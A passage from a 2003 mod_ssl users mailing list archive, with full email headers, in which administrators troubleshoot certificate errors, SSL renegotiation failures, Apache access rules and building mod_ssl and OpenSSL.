>error 7 at 0 depth lookup:certificate signature failure
>
>What is an 'error 18 at depth 0' and an 'error 7 at depth 0'? Would >this be a 
>reason why my server cannot find the Private Key?

I've no idea what this error means but I've seen it several times but never seen an explanation on the list. I would strongly recommend that you use the alternative certificate scripts available as ssl.ca-0.1.tar.gz at:

http://www.openssl.org/contrib/

These have fixed this problem for me numerous times.

_______________________________________________
No banners. No pop-ups. No kidding.
Introducing My Way - http://www.myway.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 10 19:28:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id ABC3F2AA047; Mon, 10 Mar 2003 19:28:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from filibusta.crema.unimi.it (filibusta.crema.unimi.it [159.149.70.89])
	by master.modssl.org (Postfix) with ESMTP id EBDA72AA015
	for ; Mon, 10 Mar 2003 19:28:38 +0100 (CET)
Received: by filibusta.crema.unimi.it (Postfix, from userid 701)
	id 8E1F2C6; Mon, 10 Mar 2003 19:25:38 +0100 (CET)
Date: Mon, 10 Mar 2003 19:25:38 +0100
To: modssl-users@modssl.org
Subject: Re: HTTPS environment variable is set after .htacces is parsed
Message-ID: <20030310182538.GA786@filibusta.crema.unimi.it>
Mail-Followup-To: modssl-users@modssl.org
References: <20030301155124.GB8082@filibusta.crema.unimi.it> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
From: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, Mar 01, 2003 at 11:02:22AM -0500, Cliff Woolley wrote:
> On Sat, 1 Mar 2003, Domenico Andreoli wrote:
> 
> > order deny,allow
> > deny from all
> > allow from 127.0.0.1
> > allow from env=HTTPS
> 
> Why do you need that env var?  Use this instead:
> 
> 
> order deny,allow
> deny from all
> allow from 127.0.0.1
> SSLRequireSSL
> 
> 

after some thinking at it, i see you answer is not suitable for my
needs. indeed, your mandates the use of SSL, while mine allowed access
from localhost *or* SSL.

i need something that can be put into allow directive...

thanks
cavok

-----[ Domenico Andreoli, aka cavok
 --[ http://filibusta.crema.unimi.it/~cavok/gpgkey.asc
   ---[ 3A0F 2F80 F79C 678A 8936  4FEE 0677 9033 A20E BC50
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 10 20:51:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9A6702AA049; Mon, 10 Mar 2003 20:51:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (bistromath2.cs.Virginia.EDU [128.143.137.216])
	by master.modssl.org (Postfix) with ESMTP id 6CAFB2AA046
	for ; Mon, 10 Mar 2003 20:51:54 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h2AJnoG3022270
	for ; Mon, 10 Mar 2003 14:49:51 -0500
Date: Mon, 10 Mar 2003 14:49:50 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: HTTPS environment variable is set after .htacces is parsed
In-Reply-To: <20030310182538.GA786@filibusta.crema.unimi.it>
Message-ID: 
References: <20030301155124.GB8082@filibusta.crema.unimi.it>
 
 <20030310182538.GA786@filibusta.crema.unimi.it>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, 10 Mar 2003, Domenico Andreoli wrote:

> > order deny,allow
> > deny from all
> > allow from 127.0.0.1
> > SSLRequireSSL
>
> after some thinking at it, i see you answer is not suitable for my
> needs. indeed, your mandates the use of SSL, while mine allowed access
> from localhost *or* SSL.

Okay then, do this:

order deny,allow
deny from all
allow from 127.0.0.1
SSLRequireSSL
Satisfy any

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 10 22:09:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3D2512AA047; Mon, 10 Mar 2003 22:09:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warpspeed.megalink.net (warpspeed.megalink.net [205.243.60.4])
	by master.modssl.org (Postfix) with ESMTP id 648942AA015
	for ; Mon, 10 Mar 2003 22:09:29 +0100 (CET)
Received: from [66.231.194.232] (HELO travis1)
  by warpspeed.megalink.net (CommuniGate Pro SMTP 4.0.1)
  with SMTP id 104552924 for modssl-users@modssl.org; Mon, 10 Mar 2003 16:08:35 -0500
From: "Travis Farmer" 
To: 
Subject: Creating Netscape compatible apache server certificates
Date: Mon, 10 Mar 2003 16:09:26 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Travis Farmer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Whenever I try t view my SSL site from Netscape, I get either an error that
the certificate is corrupted, or "The certificate is not approved for the
attempted application".
This certificate works fine when the page is viewed from MSIE.

The cert is signed with a self-signed-CA by the way.

Any way to alter what the cert is "approved" for so Netscape users will be
able to view the site?

Thanks in advance.

~Travis

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 11 13:01:32 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 635972AA047; Tue, 11 Mar 2003 13:01:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gavia.izoard.com (mail.izoard.com [64.3.36.44])
	by master.modssl.org (Postfix) with ESMTP id 61EE12AA01F
	for ; Tue, 11 Mar 2003 13:01:30 +0100 (CET)
Received: from mortirolo.izoard.com ([192.168.0.50] helo=izoard.com)
	by gavia.izoard.com with smtp (Exim 3.35 #1 (Debian))
	id 18siRj-0002tP-00
	for ; Tue, 11 Mar 2003 07:01:27 -0500
Received: from 199.196.144.17
        (SquirrelMail authenticated user ams)
        by www.izoard.com with HTTP;
        Tue, 11 Mar 2003 07:01:27 -0500 (EST)
Message-ID: <58218.199.196.144.17.1047384087.squirrel@www.izoard.com>
Date: Tue, 11 Mar 2003 07:01:27 -0500 (EST)
Subject: Need SSL debug help
From: "Aaron Stromas" 
To: 
X-Mailer: SquirrelMail (version 1.2.0 [rc2])
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aaron Stromas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I need help interpreting mod_ssl log below. Does "error in SSLv3 read client
hello B" mean that the client sent something invalid? What happens is that
the client (browser) connects to the server using server authenticated SSL,
downloads an applet that logs into PKI and opens a mutually authenticated
SSL connection to a servlet. I really need help with this one. Thanks.

-a

[11/Mar/2003 07:39:41 00544] [trace] OpenSSL: Handshake: start
[11/Mar/2003 07:39:41 00544] [trace] OpenSSL: Loop: before/accept
initialization[11/Mar/2003 07:39:41 00544] [trace] Inter-Process Session Cache (DBM)
Expiry: old: 2, new: 2, removed: 0
[11/Mar/2003 07:39:41 00544] [trace] Inter-Process Session Cache:
request=GET status=FOUND
id=4D94A143C716A1719F474DE73312788D67C17DC2169FC073A2E83751E5C87721 (session
reuse)
[11/Mar/2003 07:39:41 00544] [trace] OpenSSL: Loop: SSLv3 read client hello A
[11/Mar/2003 07:39:41 00544] [trace] OpenSSL: Loop: SSLv3 write server
hello A[11/Mar/2003 07:39:41 00544] [trace] OpenSSL: Loop: SSLv3 write change
cipher spec A
[11/Mar/2003 07:39:41 00544] [trace] OpenSSL: Loop: SSLv3 write finished A
[11/Mar/2003 07:39:41 00544] [trace] OpenSSL: Loop: SSLv3 flush data
[11/Mar/2003 07:39:41 00544] [trace] OpenSSL: Loop: SSLv3 read finished A
[11/Mar/2003 07:39:41 00544] [trace] OpenSSL: Handshake: done
[11/Mar/2003 07:39:41 00544] [info]  Connection: Client IP: 164.95.119.43,
Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA (168/168 bits)
[11/Mar/2003 07:39:42 00544] [info]  Initial (No.1) HTTPS request received
for child 2 (server www-sps.sps.fms.treas.gov:443)
[11/Mar/2003 07:39:42 00544] [trace] Changed client verification type will
force renegotiation
[11/Mar/2003 07:39:42 00544] [info]  Requesting connection re-negotiation
[11/Mar/2003 07:39:42 00544] [trace] Performing full renegotiation: complete
handshake protocol
[11/Mar/2003 07:39:50 00544] [trace] I/O: sucked 4708 bytes of input data
from SSL/TLS I/O layer for delayed injection into Apache I/O layer
[11/Mar/2003 07:39:50 00544] [trace] OpenSSL: Handshake: start
[11/Mar/2003 07:39:50 00544] [trace] OpenSSL: Loop: SSL renegotiate ciphers
[11/Mar/2003 07:39:50 00544] [trace] OpenSSL: Loop: SSLv3 write hello
request A[11/Mar/2003 07:39:50 00544] [trace] OpenSSL: Loop: SSLv3 flush data
[11/Mar/2003 07:39:50 00544] [info]  Awaiting re-negotiation handshake
[11/Mar/2003 07:39:50 00544] [trace] OpenSSL: Handshake: start
[11/Mar/2003 07:39:50 00544] [trace] OpenSSL: Loop: before accept
initialization[11/Mar/2003 07:39:50 00544] [trace] Inter-Process Session Cache:
request=REM status=OK
id=4D94A143C716A1719F474DE73312788D67C17DC2169FC073A2E83751E5C87721 (session
dead)
[11/Mar/2003 07:39:50 00544] [trace] OpenSSL: Write: SSLv3 read client
hello B[11/Mar/2003 07:39:50 00544] [trace] OpenSSL: Exit: error in SSLv3 read
client hello B
[11/Mar/2003 07:39:50 00544] [error] Re-negotiation handshake failed: Not
accepted by client!?
[11/Mar/2003 07:39:50 00544] [trace] I/O: injecting 4708 bytes of pre-sucked
data into Apache I/O layer
[11/Mar/2003 07:39:50 00544] [trace] OpenSSL: Write: SSLv3 read client
hello B[11/Mar/2003 07:39:50 00544] [trace] OpenSSL: Exit: error in SSLv3 read
client hello B
[11/Mar/2003 07:39:50 00544] [error] SSL error on writing data (OpenSSL
library error follows)
[11/Mar/2003 07:39:50 00544] [error] OpenSSL: error:140940F5:SSL
routines:SSL3_READ_BYTES:unexpected record
[11/Mar/2003 07:39:50 00544] [info]  Connection to child 2 closed with
standard shutdown (server www-sps.sps.fms.treas.gov:443, client
164.95.119.43)[11/Mar/2003 07:39:53 00545] [trace] OpenSSL: Write: SSL negotiation
finished successfully
[11/Mar/2003 07:39:53 00545] [info]  Connection to child 3 closed with
standard shutdown (server www-sps.sps.fms.treas.gov:443, client
164.95.119.43)[11/Mar/2003 07:42:47 00747] [trace] OpenSSL: Exit: error in SSLv2/v3 read
client hello A
[11/Mar/2003 07:42:47 00747] [error] SSL handshake timed out (client
164.95.119.43, server www-sps.sps.fms.treas.gov:443)

-- 
Aaron Stromas         | "Tik-tik-tik!!!... ja, Pantani is weg..."
ams@izoard.com        | BRTN commentator
+1 (301) 493 4933     | L'Alpe d'Huez
http://www.izoard.com | 1995 Tour de France



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 12 08:51:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4157F2AA047; Wed, 12 Mar 2003 08:51:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from kimera.nerraw.net (kimera.vosn.net [209.197.245.230])
	by master.modssl.org (Postfix) with ESMTP id 87E182AA015
	for ; Wed, 12 Mar 2003 08:51:34 +0100 (CET)
Received: from dhcp44-111.mcs.kent.edu ([131.123.44.111] helo=tomatocheese.com)
	by kimera.nerraw.net with asmtp (TLSv1:DES-CBC3-SHA:168)
	(Exim 3.36 #1)
	id 18t10x-0000Or-00; Wed, 12 Mar 2003 15:51:04 +0800
Date: Wed, 12 Mar 2003 02:51:26 -0500
Subject: Cannot Load mod_ssl.so
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v551)
Cc: admin@servism.com
To: modssl-users@modssl.org
From: Joannou Ng 
Content-Transfer-Encoding: 7bit
Message-Id: <6D84C134-545F-11D7-8B96-0003936E421A@tomatocheese.com>
X-Mailer: Apple Mail (2.551)
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - kimera.nerraw.net
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [0 0]
X-AntiAbuse: Sender Address Domain - tomatocheese.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joannou Ng 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi people,

I compiled and installed the mod_ssl DSO with apxs. But when I try to 
restart Apache, it tells me it couldn't load the module:

Undefined symbol "ssl_cmd_SSLMutex"

Anybody know what could be the problem?

Cheers, Joannou.

There are only 10 kinds of people in this world; those who know binary 
and those who don't. - Anonymous

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 12 11:23:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8F8772AA047; Wed, 12 Mar 2003 11:23:19 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ceca.es (mail.ceca.es [80.68.128.18])
	by master.modssl.org (Postfix) with ESMTP id 6EDB12AA015
	for ; Wed, 12 Mar 2003 11:23:17 +0100 (CET)
Received: from mailcaja.cajacanarias.local (gtwcanarias.cajacanarias.es [192.168.20.22])
	by mail.ceca.es (8.12.8/8.12.8) with ESMTP id h2CANDmo032685
	for ; Wed, 12 Mar 2003 11:23:13 +0100
Received: from EXCHANGEV1.cajacanarias.local ([10.36.161.164]) by mailcaja.cajacanarias.local with Microsoft SMTPSVC(5.0.2195.5329);
	 Wed, 12 Mar 2003 10:20:11 +0000
Received: from eduardozurita ([10.36.162.26]) by EXCHANGEV1.cajacanarias.local with Microsoft SMTPSVC(5.0.2195.5329);
	 Wed, 12 Mar 2003 10:20:11 +0000
Message-ID: <002801c2e881$a58bc120$1aa2240a@cajacanarias.es>
From: "Eduardo Zurita" 
To: 
Subject: mod-ssl + Apache 2.0.44
Date: Wed, 12 Mar 2003 10:25:04 -0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0025_01C2E881.A57B1F50"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-OriginalArrivalTime: 12 Mar 2003 10:20:11.0639 (UTC) FILETIME=[F6F34070:01C2E880]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Eduardo Zurita" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0025_01C2E881.A57B1F50
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello,

    I'm trying to configure Apache 2.0.44 + mod_ssl and i'm getting =
this:

    [root@ntec00 mod_ssl-2.8.12-1.3.27]# ./configure =
--with-apache=3D../httpd-2.0.44
Configuring mod_ssl/2.8.12 for Apache/1.3.27
./configure:Error: Cannot find Apache 1.3 source tree under =
../httpd-2.0.44
./configure:Hint:  Please specify location via --with-apache=3DDIR
   =20
what is wrong?

I know Apache version is not 1.3.27, but I have read in book that it can =
be configured with Apache 2.0.x

Any help would be appreciated.

Thanks.

Eduardo.
------=_NextPart_000_0025_01C2E881.A57B1F50
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hello,


 


    I'm trying to =
configure Apache=20
2.0.44 + mod_ssl and i'm getting this:


 


    [root@ntec00=20
mod_ssl-2.8.12-1.3.27]# ./configure =
--with-apache=3D../httpd-2.0.44
Configuring=20
mod_ssl/2.8.12 for Apache/1.3.27
./configure:Error: Cannot find =
Apache 1.3=20
source tree under ../httpd-2.0.44
./configure:Hint:  Please =
specify=20
location via --with-apache=3DDIR


    


what is wrong?


 


I know Apache version is not =
1.3.27, but I=20
have read in book that it can be configured with Apache =
2.0.x


 


Any help would be =
appreciated.


 


Thanks.


 


Eduardo.


------=_NextPart_000_0025_01C2E881.A57B1F50--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 12 11:27:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AB6562AA049; Wed, 12 Mar 2003 11:27:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 82D6D2AA021
	for ; Wed, 12 Mar 2003 11:27:53 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id E743A6E4024; Wed, 12 Mar 2003 11:27:46 +0100 (CET)
Date: Wed, 12 Mar 2003 11:27:46 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mod-ssl + Apache 2.0.44
Message-ID: <20030312102746.GB12712@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <002801c2e881$a58bc120$1aa2240a@cajacanarias.es>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <002801c2e881$a58bc120$1aa2240a@cajacanarias.es>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Mar 12, 2003 at 10:25:04AM -0000, Eduardo Zurita wrote:
> Hello,
> 
>     I'm trying to configure Apache 2.0.44 + mod_ssl and i'm getting this:
> 
>     [root@ntec00 mod_ssl-2.8.12-1.3.27]# ./configure --with-apache=../httpd-2.0.44
> Configuring mod_ssl/2.8.12 for Apache/1.3.27
> ./configure:Error: Cannot find Apache 1.3 source tree under ../httpd-2.0.44
> ./configure:Hint:  Please specify location via --with-apache=DIR
>     
> what is wrong?
> 
Mod_ssl is included in Apache2, so you don't need a seperate download - see 
./configure --help in the Apache 2 source for instructions on how to enable
mod_ssl.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 12 17:22:48 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 505562AA04D; Wed, 12 Mar 2003 17:22:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (bistromath2.cs.Virginia.EDU [128.143.137.216])
	by master.modssl.org (Postfix) with ESMTP id C41FE2AA015
	for ; Wed, 12 Mar 2003 17:22:46 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h2CGMYmc000453;
	Wed, 12 Mar 2003 11:22:34 -0500
Date: Wed, 12 Mar 2003 11:22:34 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: Kitty Ko 
Cc: modssl-users@modssl.org
Subject: Re: Help on Apache 2.0.43 + SSL installation
In-Reply-To: <20030308203602.80415.qmail@web41106.mail.yahoo.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I'm cc:ing the users list so that the response is in the archives in case
anyone else has a similar problem.


On Sat, 8 Mar 2003, Kitty Ko wrote:

> How are you? I read accross one of your email replay on the "binding
> shared libraries with OpenSSL" on the interent, and that's how I got
> your email address.
>
> I have encounter problems while installing SSL + APACHE.  I am wondering
> if you can give me some hits.
>
> I have successfully completed installing Tomcat 4.0.6 + Apache 2.0.43 on
> the Unix box.  Buy I can't have SSL installed.  FYI.  I build apache and
> open ssl form source.
>
> After I extracted the openssl-0.9.7, I did the following:
>
> # cd openssl-0.9.7
>
> # ./config --prefix=/depot/ssl/install
> --openssldir=/depot/ssl/install/openssl
>
> # make
>
> However, once I get into make build-shared, i got the following errors:
>
> ld:fetal: relocations remain against allocatable but non-writable
> sections colletc2:  ld returned 1 exit status
>
> make: ***[do-solars-shared] Error 1
>
> My questions are:
>
> 1.  how to fix this compile error

Hmmm... well honestly I'm not all that familiar with linker problems on
Solaris.  I have heard a number of people report problems getting the
shared library build of openssl to work on Solaris, though that's about as
much insight as I can offer.  The option to use both a static openssl and
a static mod_ssl remains, of course, and at this point sounds like your
best option.

> 2.  how do i know if I compiled mod_ssl statically or dynamicelly?

"httpd -l" will list all the statically-compiled modules.

> I build the apache by the following command:
>
> # ./configure --with-layout=Apache --prefix=/depot/apache2
> --enable-mods-shared=most --enable-ssl=shared
                            ^^^^^^^^^^^^^^^^^^^

...though this right here tells me you've built it as shared, since that's
what that means.  :)

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 12 18:44:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 641342AA047; Wed, 12 Mar 2003 18:44:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id C023C2AA015
	for ; Wed, 12 Mar 2003 18:44:54 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 3F343807A6
	for ; Thu, 13 Mar 2003 14:09:52 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Thu, 13 Mar 2003 14:09:52 -0600
User-Agent: KMail/1.4.3
References: <20030310104238.91B5D39D7@xmxpita.myway.com>
In-Reply-To: <20030310104238.91B5D39D7@xmxpita.myway.com>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303131409.52605.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Still no luck. I get the same error with this script too. Thank you for=20
pointing out the script though. It was a LOT easier to use than the other=
 one=20
I had been using.=20


On Monday 10 March 2003 04:42, camun2020 wrote:
> >1 out of 1 certificate requests certified, commit? [y/n]y
> >Write out database with 1 new entries
> >ata Base Updated
> >CA verifying: server.crt <-> CA cert
> >server.crt: /C=3DUS/ST=3DKansas/L=3DLawrence/O=3DPelathe
> >Center/CN=3Dwww.pelathe.org/Email=3Dtkitchen@pelathe.org
> >error 18 at 0 depth lookup:self signed certificate
> >/C=3DUS/ST=3DKansas/L=3DLawrence/O=3DPelathe
> >Center/CN=3Dwww.pelathe.org/Email=3Dtkitchen@pelathe.org
> >error 7 at 0 depth lookup:certificate signature failure
> >
> >What is an 'error 18 at depth 0' and an 'error 7 at depth 0'? Would >t=
his
> > be a reason why my server cannot find the Private Key?
>
> I've no idea what this error means but I've seen it several times but n=
ever
> seen an explanation on the list. I would strongly recommend that you us=
e
> the alternative certificate scripts available as ssl.ca-0.1.tar.gz at:
>
> http://www.openssl.org/contrib/
>
> These have fixed this problem for me numerous times.
>
> _______________________________________________
> No banners. No pop-ups. No kidding.
> Introducing My Way - http://www.myway.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 12:01:55 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1EA402AA02A; Thu, 13 Mar 2003 12:01:55 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xmxpita.myway.com (nn7.excitenetwork.com [207.159.120.61])
	by master.modssl.org (Postfix) with ESMTP id 843FD2AA01F
	for ; Thu, 13 Mar 2003 12:01:51 +0100 (CET)
Received: by xmxpita.myway.com (Postfix, from userid 110)
	id B864C39E1; Thu, 13 Mar 2003 06:01:36 -0500 (EST)
To: modssl-users@modssl.org
Subject: Re: private key not found
Received: from [194.201.150.100] by mprdmailfe1.nwk.myway.com via HTTP; Thu, 13 Mar 2003 06:01:36 EST
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: ID = 427ca1860f709c6c72e7c11ebe29e70d
From: "camun2020" 
MIME-Version: 1.0
X-Sender: camun2020@myway.com
X-Mailer: PHP
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Cc: 
Message-Id: <20030313110136.B864C39E1@xmxpita.myway.com>
Date: Thu, 13 Mar 2003 06:01:36 -0500 (EST)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "camun2020" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


 --- On Thu 03/13, A. Putnam < aputnam@pelathe.org > wrote:

Still no luck. I get the same error with this script too. Thank you for 
pointing out the script though. It was a LOT easier to use than the other one 
I had been using. 

OK, now I'm getting vague but could this be to do with the fact that you have some 'incomplete' keys and data in your ca.db.certs directory from the previous failed attempts? 

Make sure you start in a whole new clean directory... 

Having said that, I haven't actually tried those scripts with the most recent openssl so perhaps there are new problems.

cam

_______________________________________________
No banners. No pop-ups. No kidding.
Introducing My Way - http://www.myway.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 13 14:12:27 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B7DA52AA02A; Thu, 13 Mar 2003 14:12:27 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from speedy.ida.ing.tu-bs.de (speedy.ida.ing.tu-bs.de [134.169.132.53])
	by master.modssl.org (Postfix) with ESMTP id 0FDD52AA01F
	for ; Thu, 13 Mar 2003 14:12:25 +0100 (CET)
Received: from krantor (krantor [134.169.132.71])
